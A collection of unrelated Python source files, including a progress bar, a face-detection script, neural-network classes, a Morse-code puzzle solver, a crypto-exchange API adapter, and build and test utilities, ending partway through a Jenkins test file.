self.note_list.select_note(self.note_list.get(self.note_list.curselection()))
|
# -*- coding: UTF-8 -*-
import time
import sys
# import terminalcomman
import terminalsize
class RunBar:
term_size = terminalsize.get_terminal_size()[1]
def __init__(self, total_size, total_pieces=1):
self.displayed = False
self.total_size = total_size
self.total_pieces = total_pieces
self.current_piece = 1
self.received = 0
self.speed = ''
self.last_updated = time.time()
total_pieces_len = len(str(total_pieces))
# 38 is the size of all statically known size in self.bar
total_str = '%5s' % round(self.total_size / 1048576, 1)
total_str_width = max(len(total_str), 5)
self.bar_size = self.term_size - 28 - 2 * total_pieces_len \
- 2 * total_str_width
# self.bar = '{0:>4}%% ({1:>%s}/%sMB) ├{2:─<%s}┤[{3:>%s}/{4:>%s}] {5}' % (
# total_str_width, total_str, self.bar_size, total_pieces_len,
# total_pieces_len
# )
self.bar = '{0:>4}%% ({1:>%s}/%sMB) ├{2:<%s}┤[{3:>%s}/{4:>%s}] {5}' % (
total_str_width, total_str, self.bar_size, total_pieces_len,
total_pieces_len
)
# self.bar = '{0}% ({1}/953.0MB) ├{2}┤[{3}/{4}] {5}'
# print self.bar
# print total_str_width, total_str, self.bar_size, total_pieces_len,total_pieces_len
def update(self):
self.displayed = True
bar_size = self.bar_size
percent = round(self.received * 100 / self.total_size, 1)
if percent >= 100:
percent = 100
dots = bar_size * int(percent) // 100
plus = int(percent) - dots // bar_size * 100
if plus > 0.8:
plus = '█'
elif plus > 0.4:
plus = '>'
else:
plus = ''
bar = '█' * dots + plus
# print percent , round(self.received / 1048576, 1), bar,self.current_piece, self.total_pieces, self.speed
bar = self.bar.format(
percent, round(self.received / 1048576, 1), bar,
self.current_piece, self.total_pieces, self.speed
)
sys.stdout.write('\r' + bar)
sys.stdout.flush()
def update_received(self, n):
self.received += n
time_diff = time.time() - self.last_updated
bytes_ps = n / time_diff if time_diff else 0
if bytes_ps >= 1024 ** 3:
self.speed = '{:4.0f} GB/s'.format(bytes_ps / 1024 ** 3)
elif bytes_ps >= 1024 ** 2:
self.speed = '{:4.0f} MB/s'.format(bytes_ps / 1024 ** 2)
elif bytes_ps >= 1024:
self.speed = '{:4.0f} kB/s'.format(bytes_ps / 1024)
else:
self.speed = '{:4.0f} B/s'.format(bytes_ps)
self.last_updated = time.time()
self.update()
def update_piece(self, n):
self.current_piece = n
def done(self):
if self.displayed:
print()
self.displayed = False
if __name__ == "__main__":
bar = RunBar(10000000)
from time import sleep
from random import randint
for i in range(1000):
bar.update_received(randint(10000,100000))
sleep(0.3)
|
# -*- coding: utf-8 -*-
import cv2
import sys
import gc
from train import Model
if __name__ == '__main__':
if len(sys.argv) != 1:
print("Usage:%s camera_id\r\n" % (sys.argv[0]))
sys.exit(0)
# 加载模型
model = Model()
model.load_model(file_path='../model/face.model.h5')
# 框住人脸的矩形边框颜色
color = (0, 255, 0)
# 捕获指定摄像头的实时视频流
cap = cv2.VideoCapture(0)
# 人脸识别分类器本地存储路径
# cascade_path = "haarcascade_frontalface_alt2.xml"
# 循环检测识别人脸
while True:
ret, frame = cap.read() # 读取一帧视频
if ret is True:
# 图像灰化,降低计算复杂度
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
else:
continue
faceID = model.face_predict(frame)
# 如果有人脸
if faceID == 0:
# 文字提示是谁
cv2.putText(frame, 'There is face',
(30, 30), # 坐标
cv2.FONT_HERSHEY_SIMPLEX, # 字体
1, # 字号
(255, 0, 255), # 颜色
2) # 字的线宽
else:
cv2.putText(frame, 'There is no face',
(30, 30), # 坐标
cv2.FONT_HERSHEY_SIMPLEX, # 字体
1, # 字号
(255, 0, 255), # 颜色
2) # 字的线宽
pass
cv2.imshow("识别朕", frame)
# 等待10毫秒看是否有按键输入
k = cv2.waitKey(10)
# 如果输入q则退出循环
if k & 0xFF == ord('q'):
break
# 释放摄像头并销毁所有窗口
cap.release()
cv2.destroyAllWindows()
|
import numpy as np
from layer_utils import *
""" Super Class """
class Module(object):
def __init__(self):
self.params = {}
self.grads = {}
def forward(self):
raise ValueError("Not Implemented Error")
def backward(self):
raise ValueError("Not Implemented Error")
""" Classes """
class TestFCReLU(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.net = sequential(
########## TODO: ##########
fc(12, 10, name='my_fc'),
relu(name='my_relu')
########### END ###########
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class SmallFullyConnectedNetwork(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.net = sequential(
########## TODO: ##########
fc(4, 30, name='fc1'),
relu(name='relu1'),
fc(30, 7, name='fc2'),
relu(name='relu2')
########### END ###########
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class DropoutNet(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.dropout = dropout
self.seed = seed
self.net = sequential(
fc(15, 20, 5e-2, name="fc1"),
relu(name="relu1"),
fc(20, 30, 5e-2, name="fc2"),
relu(name="relu2"),
fc(30, 10, 5e-2, name="fc3"),
relu(name="relu3"),
dropout(dropout_p, seed=seed)
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class TinyNet(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
""" Some comments """
self.net = sequential(
########## TODO: ##########
fc(3*32*32, 512, 2/(float(3072+512)), name="fc1"),
relu(name="relu1"),
fc(512, 10, 2/float(512+10), name="fc2"),
relu(name="relu2")
########### END ###########
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class DropoutNetTest(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.dropout = dropout
self.seed = seed
self.net = sequential(
fc(3072, 500, 1e-2, name="fc1"),
relu(name="relu1"),
fc(500, 500, 1e-2, name="fc2"),
relu(name="relu2"),
fc(500, 10, 1e-2, name="fc3"),
dropout(dropout_p, seed=seed)
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class FullyConnectedNetwork_2Layers(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.net = sequential(
fc(5, 5, name="fc1"),
relu(name="relu1"),
fc(5, 5, name="fc2")
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
class FullyConnectedNetwork(object):
def __init__(self, dropout_p=0, dtype=np.float32, seed=None):
self.net = sequential(
fc(3072, 100, 5e-2, name="fc1"),
relu(name="relu1"),
fc(100, 100, 5e-2, name="fc2"),
relu(name="relu2"),
fc(100, 100, 5e-2, name="fc3"),
relu(name="relu3"),
fc(100, 100, 5e-2, name="fc4"),
relu(name="relu4"),
fc(100, 100, 5e-2, name="fc5"),
relu(name="relu5"),
fc(100, 10, 5e-2, name="fc6")
)
def forward(self, feat, is_Training=True):
output = feat
for layer in self.net.layers:
if isinstance(layer, dropout):
output = layer.forward(output, is_Training)
else:
output = layer.forward(output)
self.net.gather_params()
return output
def backward(self, dprev):
for layer in self.net.layers[::-1]:
dprev = layer.backward(dprev)
self.net.gather_grads()
return dprev
|
from enum import Enum
from typing import (
List,
Optional,
)
_Signals = Enum("Signals", ["DOT", "DASH"])
_Pauses = Enum("Pauses", ["SIGNAL", "LETTER", "WORD"])
_ON_TIMINGS = {
0.25: _Signals.DOT,
0.75: _Signals.DASH,
}
_OFF_TIMINGS = {
0.25: _Pauses.SIGNAL,
1.25: _Pauses.LETTER,
2.50: _Pauses.WORD,
}
_ORDERED_WORDS = (
'shell',
'halls',
'slick',
'trick',
'boxes',
'leaks',
'strobe',
'bistro',
'flick',
'bombs',
'break',
'brick',
'steak',
'sting',
'vector',
'beats',
)
def _make_letters():
# This function is here so that we can expose the _Signals variables with nice names, which makes the dictionary
# below much nicer. This should only be called once, to initialize the _LETTERS variable.
dot = _Signals.DOT
dash = _Signals.DASH
return {
(dot, dash): 'a',
(dash, dot, dot, dot): 'b',
(dash, dot, dash, dot): 'c',
(dash, dot, dot): 'd',
(dot,): 'e',
(dot, dot, dash, dot): 'f',
(dash, dash, dot): 'g',
(dot, dot, dot, dot): 'h',
(dot, dot): 'i',
(dot, dash, dash, dash): 'j',
(dash, dot, dash): 'k',
(dot, dash, dot, dot): 'l',
(dash, dash): 'm',
(dash, dot): 'n',
(dash, dash, dash): 'o',
(dot, dash, dash, dot): 'p',
(dash, dash, dot, dash): 'q',
(dot, dash, dot): 'r',
(dot, dot, dot): 's',
(dash,): 't',
(dot, dot, dash): 'u',
(dot, dot, dot, dash): 'v',
(dot, dash, dash): 'w',
(dash, dot, dot, dash): 'x',
(dash, dot, dash, dash): 'y',
(dash, dash, dot, dot): 'z',
}
_LETTERS = _make_letters()
def _get_closest_time_entry(seconds, timing_dict):
distances = [(abs(seconds - reference_duration), pause_type)
for reference_duration, pause_type in timing_dict.iteritems()]
distances = sorted(distances, key=lambda x: x[0])
return distances[0][1]
def _signals_to_letter(signals):
return _LETTERS[tuple(signals)]
class MorseCodeState(object):
def __init__(self):
super(MorseCodeState, self).__init__()
self.word_start_index = None
# Assuming words are 5 letters long
self.letters = [None] * 5
self.next_letter_index = 0
self.current_partial_letter = None # type: Optional[List[_Signals]]
def ingest_timing(self, seconds, is_on):
"""It is invalid to call this once is_word_known returns True"""
if is_on:
if self.current_partial_letter is None:
return
signal = _get_closest_time_entry(seconds, _ON_TIMINGS)
self.current_partial_letter.append(signal)
else:
pause_type = _get_closest_time_entry(seconds, _OFF_TIMINGS)
if pause_type == _Pauses.SIGNAL:
return
# Handle letter or word gap. Both do the letter behavior.
if self.current_partial_letter is not None:
letter = _signals_to_letter(self.current_partial_letter)
print "ADDING LETTER:", letter
self.letters[self._get_next_letter_index()] = letter
# Assume we'll never wrap around, since we should know what the word is by then.
self.next_letter_index += 1
self.current_partial_letter = []
if pause_type == _Pauses.WORD:
# It's possible this is the last thing we see, in which case we'll need to make sure it's within
# the range of the array.
self.word_start_index = self._get_next_letter_index()
def _get_next_letter_index(self):
return self.next_letter_index % len(self.letters)
def _get_word_if_possible(self):
# This function tries to find the word given a subset of the total possible information
if self.next_letter_index == 0:
# We have no information yet, so we can't know the word yet.
return None
def find_single_matching_word(predicate):
# This helper function will check to see if exactly one word matches the given predicate. If so, it will
# return that word, otherwise it'll return None.
possible_word = None
for word in _ORDERED_WORDS:
if predicate(word):
if possible_word is not None:
# Multiple possibilities, we don't know what word it is
return None
possible_word = word
return possible_word
if self.word_start_index is None:
# No start index, so we have to look inside every word
partial_word = "".join(self.letters[:self._get_next_letter_index()])
return find_single_matching_word(lambda word: partial_word in word)
else:
# We have a start index, can check beginnings and ends of words
end = "".join(self.letters[:self.word_start_index])
start = "".join(self.letters[self.word_start_index:self._get_next_letter_index()])
return find_single_matching_word(lambda word: word.startswith(start) and word.endswith(end))
def is_word_known(self):
word = self._get_word_if_possible()
if word is None and self.next_letter_index >= 2 * len(self.letters):
assert False, "Can't find word, but got all letters twice: {}".format(self.letters)
return word is not None
def get_num_time_to_press_right_arrow(self):
word = self._get_word_if_possible()
assert word is not None
return _ORDERED_WORDS.index(word)
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import base64
from ccxt.base.errors import ExchangeError
class luno (Exchange):
def describe(self):
return self.deep_extend(super(luno, self).describe(), {
'id': 'luno',
'name': 'luno',
'countries': ['GB', 'SG', 'ZA'],
'rateLimit': 10000,
'version': '1',
'has': {
'CORS': False,
'fetchTickers': True,
'fetchOrder': True,
'fetchOrders': True,
'fetchOpenOrders': True,
'fetchClosedOrders': True,
'fetchTradingFees': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766607-8c1a69d8-5ede-11e7-930c-540b5eb9be24.jpg',
'api': 'https://api.mybitx.com/api',
'www': 'https://www.luno.com',
'doc': [
'https://www.luno.com/en/api',
'https://npmjs.org/package/bitx',
'https://github.com/bausmeier/node-bitx',
],
},
'api': {
'public': {
'get': [
'orderbook',
'orderbook_top',
'ticker',
'tickers',
'trades',
],
},
'private': {
'get': [
'accounts/{id}/pending',
'accounts/{id}/transactions',
'balance',
'fee_info',
'funding_address',
'listorders',
'listtrades',
'orders/{id}',
'quotes/{id}',
'withdrawals',
'withdrawals/{id}',
],
'post': [
'accounts',
'postorder',
'marketorder',
'stoporder',
'funding_address',
'withdrawals',
'send',
'quotes',
'oauth2/grant',
],
'put': [
'quotes/{id}',
],
'delete': [
'quotes/{id}',
'withdrawals/{id}',
],
},
},
})
async def fetch_markets(self):
markets = await self.publicGetTickers()
result = []
for p in range(0, len(markets['tickers'])):
market = markets['tickers'][p]
id = market['pair']
base = id[0:3]
quote = id[3:6]
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.privateGetBalance()
wallets = response['balance']
result = {'info': response}
for b in range(0, len(wallets)):
wallet = wallets[b]
currency = self.common_currency_code(wallet['asset'])
reserved = float(wallet['reserved'])
unconfirmed = float(wallet['unconfirmed'])
balance = float(wallet['balance'])
account = {
'free': 0.0,
'used': self.sum(reserved, unconfirmed),
'total': self.sum(balance, unconfirmed),
}
account['free'] = account['total'] - account['used']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
orderbook = await self.publicGetOrderbook(self.extend({
'pair': self.market_id(symbol),
}, params))
timestamp = orderbook['timestamp']
return self.parse_order_book(orderbook, timestamp, 'bids', 'asks', 'price', 'volume')
def parse_order(self, order, market=None):
timestamp = order['creation_timestamp']
status = 'open' if (order['state'] == 'PENDING') else 'closed'
side = 'sell' if (order['type'] == 'ASK') else 'buy'
if market is None:
market = self.find_market(order['pair'])
symbol = market['symbol']
price = self.safe_float(order, 'limit_price')
amount = self.safe_float(order, 'limit_volume')
quoteFee = self.safe_float(order, 'fee_counter')
baseFee = self.safe_float(order, 'fee_base')
filled = self.safe_float(order, 'base')
cost = self.safe_float(order, 'counter')
remaining = None
if amount is not None:
if filled is not None:
remaining = max(0, amount - filled)
fee = {'currency': None}
if quoteFee:
fee['side'] = 'quote'
fee['cost'] = quoteFee
else:
fee['side'] = 'base'
fee['cost'] = baseFee
return {
'id': order['order_id'],
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': None,
'side': side,
'price': price,
'amount': amount,
'filled': filled,
'cost': cost,
'remaining': remaining,
'trades': None,
'fee': fee,
'info': order,
}
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
response = await self.privateGetOrdersId(self.extend({
'id': id,
}, params))
return self.parse_order(response)
async def fetch_orders_by_state(self, state=None, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
market = None
if state is not None:
request['state'] = state
if symbol is not None:
market = self.market(symbol)
request['pair'] = market['id']
response = await self.privateGetListorders(self.extend(request, params))
orders = self.safe_value(response, 'orders', [])
return self.parse_orders(orders, market, since, limit)
async def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_by_state(None, symbol, since, limit, params)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_by_state('PENDING', symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_by_state('COMPLETE', symbol, since, limit, params)
def parse_ticker(self, ticker, market=None):
timestamp = ticker['timestamp']
symbol = None
if market:
symbol = market['symbol']
last = self.safe_float(ticker, 'last_trade')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': self.safe_float(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_float(ticker, 'ask'),
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': self.safe_float(ticker, 'rolling_24_hour_volume'),
'quoteVolume': None,
'info': ticker,
}
async def fetch_tickers(self, symbols=None, params={}):
await self.load_markets()
response = await self.publicGetTickers(params)
tickers = self.index_by(response['tickers'], 'pair')
ids = list(tickers.keys())
result = {}
for i in range(0, len(ids)):
id = ids[i]
market = self.markets_by_id[id]
symbol = market['symbol']
ticker = tickers[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
ticker = await self.publicGetTicker(self.extend({
'pair': market['id'],
}, params))
return self.parse_ticker(ticker, market)
def parse_trade(self, trade, market):
side = 'buy' if (trade['is_buy']) else 'sell'
return {
'info': trade,
'id': None,
'order': None,
'timestamp': trade['timestamp'],
'datetime': self.iso8601(trade['timestamp']),
'symbol': market['symbol'],
'type': None,
'side': side,
'price': self.safe_float(trade, 'price'),
'amount': self.safe_float(trade, 'volume'),
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
if since is not None:
request['since'] = since
response = await self.publicGetTrades(self.extend(request, params))
return self.parse_trades(response['trades'], market, since, limit)
async def fetch_trading_fees(self, params={}):
await self.load_markets()
response = await self.privateGetFeeInfo(params)
return {
'info': response,
'maker': self.safe_float(response, 'maker_fee'),
'taker': self.safe_float(response, 'taker_fee'),
}
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
method = 'privatePost'
order = {'pair': self.market_id(symbol)}
if type == 'market':
method += 'Marketorder'
order['type'] = side.upper()
if side == 'buy':
order['counter_volume'] = amount
else:
order['base_volume'] = amount
else:
method += 'Postorder'
order['volume'] = amount
order['price'] = price
if side == 'buy':
order['type'] = 'BID'
else:
order['type'] = 'ASK'
response = await getattr(self, method)(self.extend(order, params))
return {
'info': response,
'id': response['order_id'],
}
async def cancel_order(self, id, symbol=None, params={}):
await self.load_markets()
return await self.privatePostStoporder({'order_id': id})
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.version + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if query:
url += '?' + self.urlencode(query)
if api == 'private':
self.check_required_credentials()
auth = self.encode(self.apiKey + ':' + self.secret)
auth = base64.b64encode(auth)
headers = {'Authorization': 'Basic ' + self.decode(auth)}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
async def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = await self.fetch2(path, api, method, params, headers, body)
if 'error' in response:
raise ExchangeError(self.id + ' ' + self.json(response))
return response
|
from tests.functional.services.utils.http_utils import http_put, APIResponse
class TestSubscriptionsAPIPutReturns200:
def test_update_subscription(self, add_alpine_subscription):
subscription, api_conf = add_alpine_subscription
resp = http_put(
["subscriptions", subscription.get("subscription_id")],
{"active": False, "subscription_value": "docker.io/alpine:latest"},
config=api_conf,
)
assert resp == APIResponse(200)
|
"""SCons
The main package for the SCons software construction utility.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/__init__.py 2014/07/05 09:42:21 garyo"
__version__ = "2.3.2"
__build__ = ""
__buildsys__ = "lubuntu"
__date__ = "2014/07/05 09:42:21"
__developer__ = "garyo"
# make sure compatibility is always in place
import SCons.compat
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
# coding: utf-8
"""
OpsGenie REST API
OpsGenie OpenAPI Specification # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from opsgenie_swagger.models.base_response import BaseResponse # noqa: F401,E501
from opsgenie_swagger.models.notification_rule_meta import NotificationRuleMeta # noqa: F401,E501
class ListNotificationRulesResponse(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'request_id': 'str',
'took': 'float',
'data': 'list[NotificationRuleMeta]'
}
attribute_map = {
'request_id': 'requestId',
'took': 'took',
'data': 'data'
}
def __init__(self, request_id=None, took=0.0, data=None): # noqa: E501
"""ListNotificationRulesResponse - a model defined in Swagger""" # noqa: E501
self._request_id = None
self._took = None
self._data = None
self.discriminator = None
self.request_id = request_id
self.took = took
if data is not None:
self.data = data
@property
def request_id(self):
"""Gets the request_id of this ListNotificationRulesResponse. # noqa: E501
:return: The request_id of this ListNotificationRulesResponse. # noqa: E501
:rtype: str
"""
return self._request_id
@request_id.setter
def request_id(self, request_id):
"""Sets the request_id of this ListNotificationRulesResponse.
:param request_id: The request_id of this ListNotificationRulesResponse. # noqa: E501
:type: str
"""
if request_id is None:
raise ValueError("Invalid value for `request_id`, must not be `None`") # noqa: E501
self._request_id = request_id
@property
def took(self):
"""Gets the took of this ListNotificationRulesResponse. # noqa: E501
:return: The took of this ListNotificationRulesResponse. # noqa: E501
:rtype: float
"""
return self._took
@took.setter
def took(self, took):
"""Sets the took of this ListNotificationRulesResponse.
:param took: The took of this ListNotificationRulesResponse. # noqa: E501
:type: float
"""
if took is None:
raise ValueError("Invalid value for `took`, must not be `None`") # noqa: E501
self._took = took
@property
def data(self):
"""Gets the data of this ListNotificationRulesResponse. # noqa: E501
:return: The data of this ListNotificationRulesResponse. # noqa: E501
:rtype: list[NotificationRuleMeta]
"""
return self._data
@data.setter
def data(self, data):
"""Sets the data of this ListNotificationRulesResponse.
:param data: The data of this ListNotificationRulesResponse. # noqa: E501
:type: list[NotificationRuleMeta]
"""
self._data = data
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListNotificationRulesResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2012 Nicolas Wack <wackou@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from guessit.patterns import sep
import re
import logging
log = logging.getLogger(__name__)
def process(mtree):
for node in mtree.unidentified_leaves():
indices = []
didx = 0
pattern = re.compile(sep + '-' + sep)
match = pattern.search(node.value)
while match:
span = match.span()
indices.extend([ span[0], span[1] ])
match = pattern.search(node.value, span[1])
if indices:
node.partition(indices)
|
from __future__ import absolute_import
import json
import mock
import os.path
import responses
import pytest
import time
from datetime import datetime
from flask import current_app
from uuid import uuid5, UUID
from changes.config import db
from changes.constants import Status, Result
from changes.models import (
Artifact, TestCase, Patch, LogSource, LogChunk, Job, JobPhase, FileCoverage,
TestArtifact
)
from changes.backends.jenkins.builder import JenkinsBuilder
from changes.testutils import (
BackendTestCase, eager_tasks, SAMPLE_DIFF, SAMPLE_XUNIT, SAMPLE_COVERAGE,
SAMPLE_XUNIT_TESTARTIFACTS
)
class BaseTestCase(BackendTestCase):
builder_cls = JenkinsBuilder
builder_options = {
'master_urls': ['http://jenkins.example.com'],
'diff_urls': ['http://jenkins-diff.example.com'],
'job_name': 'server',
}
def setUp(self):
self.project = self.create_project()
super(BaseTestCase, self).setUp()
def get_builder(self, **options):
base_options = self.builder_options.copy()
base_options.update(options)
return self.builder_cls(app=current_app, **base_options)
def load_fixture(self, filename):
filepath = os.path.join(
os.path.dirname(__file__),
filename,
)
with open(filepath, 'rb') as fp:
return fp.read()
def uuid5_from(s):
"""
Get a new UUID from an existing hex-encoded Job UUID.
Args:
s (str): Hex-encoded UUID of a Job.
Returns:
str: Hex-encoded UUID derived from the original.
"""
from changes.backends.jenkins.builder import JOB_NAMESPACE_UUID
return uuid5(JOB_NAMESPACE_UUID, s).hex
# TODO(dcramer): these tests need to ensure we're passing the right parameters
# to jenkins
class CreateBuildTest(BaseTestCase):
@responses.activate
def test_queued_creation(self):
job_id = '81d1596fd4d642f4a6bdf86c45e014e8'
jobstep_id = uuid5_from(job_id)
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
'http://jenkins.example.com/queue/api/xml/?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fid&wrapper=x'.format(jobstep_id),
body=self.load_fixture('fixtures/GET/queue_item_by_job_id.xml'),
match_querystring=True)
responses.add(
responses.GET,
'http://jenkins.example.com/job/server/api/xml/?depth=1&xpath=/queue/item[action/parameter/name=%22CHANGES_BID%22%20and%20action/parameter/value=%22{}%22]/id'.format(jobstep_id),
status=404,
match_querystring=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(job_id))
builder = self.get_builder()
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data == {
'build_no': None,
'item_id': '13',
'job_name': 'server',
'queued': True,
'uri': None,
'master': 'http://jenkins.example.com',
}
@responses.activate
def test_active_creation(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
jobstep_id = uuid5_from(job_id)
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
'http://jenkins.example.com/queue/api/xml/?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fid&wrapper=x'.format(jobstep_id),
status=404,
match_querystring=True)
responses.add(
responses.GET,
'http://jenkins.example.com/job/server/api/xml/?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fnumber&depth=1&wrapper=x'.format(jobstep_id),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'),
match_querystring=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data == {
'build_no': '1',
'item_id': None,
'job_name': 'server',
'queued': False,
'uri': None,
'master': 'http://jenkins.example.com',
}
@responses.activate
@mock.patch.object(JenkinsBuilder, '_find_job')
def test_patch(self, find_job):
responses.add(
